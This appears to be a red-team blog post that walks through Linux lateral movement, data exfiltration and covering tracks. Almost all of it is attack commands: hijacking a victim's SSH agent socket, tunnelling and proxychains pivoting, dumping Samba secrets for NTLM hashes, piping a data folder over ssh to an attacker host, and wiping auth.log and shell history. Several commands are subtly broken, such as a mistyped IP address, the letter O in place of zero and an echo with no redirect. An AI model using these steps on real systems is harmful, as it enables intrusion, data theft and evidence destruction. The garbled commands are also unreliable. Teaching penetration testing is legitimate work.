Linux Lateral Movement And Exfiltration.
Introduction
In this blog post we will discuss, Linux lateral movements, Data Exfiltration, covering tracks.
Lateral Movement
Its a technique to move around in a network in search of data or assets to exfiltrate and gain access to multiple target assets.
SSH Hijacking
For this method to be successful, the compromised machine should have an active SSH session established to another machine via Public Key Authentication.
# Attacker finds the SSHd process of the victim
ps uax|grep sshd
``
``
# Attacker looks for the SSH_AUTH_SOCK on victim's environment variables
grep SSH_AUTH_SOCK /proc/<pid>/environ
``
``
# Attacker hijack's victim's ssh-agent socket
SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l
``
``
# Attacker can log in to remote systems as the victim
ssh remote_system -l victim
Click here to know more about it
SSH Tunneling
It is used to port forward the attacker machine to access internal assets
Local port forwarding on port 8080 through SSH TUNNEL from attacker session to another machine.
sudo ssh -L 127.0.0.1:8080:192,168.1,118:8080 user@<targetIP>
Remote forward on 8080 , forward to the attacker on 443
sudo ssh -R8080:127.0.0.1:443 user@<targetip>
sshuttle is an alternative for ssh tunneling
https://github.com/sshuttle/sshuttle
Proxy chaining
proxychains - redirect connections through proxy servers
To configure ProxyChains, we simply edit the main configuration file (/etc/proxychains.conf) and add our SOCKS4 proxy to it we will append following line proxychains.conf file
socks4 127.0.0.1 1337
ssh -D1337 root@2.2.2.2 (For dynamic tunneling)
In a separate terminal run:
proxychains nmap -A -p- <10.10.10.139>
And you will be able to use nmap with proxychains to scan any internal host. Proxychains tunneling used to discover internal host services and internal networks.
VPNPivot VPN Pivot sends and receives a fully encrypted TCP/IP stack over TCP stream socket, then the peers forward it into the desired device/host. The attacker explores the internal network as he belongs to it within a local IP address taken from the DHCP server or statically configured.
Installation
# git clone https://github.com/0x36/VPNPivot.git
cd VPNPivot
./autogen.sh
./configure
make && make install
Usage:
./src/pivotc <server IP> <server port> <locale IP> [MTU]
The options are :
server IP: the IP address of the server (pivots)
server port: the port which the server is listening on
locale IP: the IP address of the network interface connected to the unreachable network.
MTU: the MUT is optional unless you're changing it in pivots
Samba system secrets to take over domain admin
tdbdump /var/lib/samba/private/secrets.tdb
If we get NTLM hash for any machine in the domain we can compromise it using pass the hash technic.
I will explain pass the hash in the upcoming blog post.
Data Exfiltration
Exfiltration of sensitive data from the target machine, and owning that data to see severity.
There are many techniques to move data from the target machine to attacker machine
** Using SSH**
Start nc listner in attaker machine
nc -nlvp 80 > Targetdata.tmp
In target machine
tar zcf - /tmp/datafolder | ssh root@<attackerIP> "cd /tmp; tar zxpf -"
**
Cover tracks
Washing hands, after did a sin.
Clear auth.log file
echo "" /var/log/auth.log
Clear current user bash history
echo "" -/.bash history
Delete .bash_history file
rm -/.bash histor/ -rf
Clear current session history
history -c
Set history max lines to 0
export HISTFILESIZE=O
Set history max commands to 0
export HISTSIZE=O
To kill current session
kill -9 $$
To permanently send all bash history commands to /dev/null
ln /dev/null -/.bash_history -sf
There are many other techniques also, you can check them yourself and keep practice.
Conclusion
In this blog post we discussed some lateral movement and data exfiltration techniques, we will discuss persistence in upcoming red team series.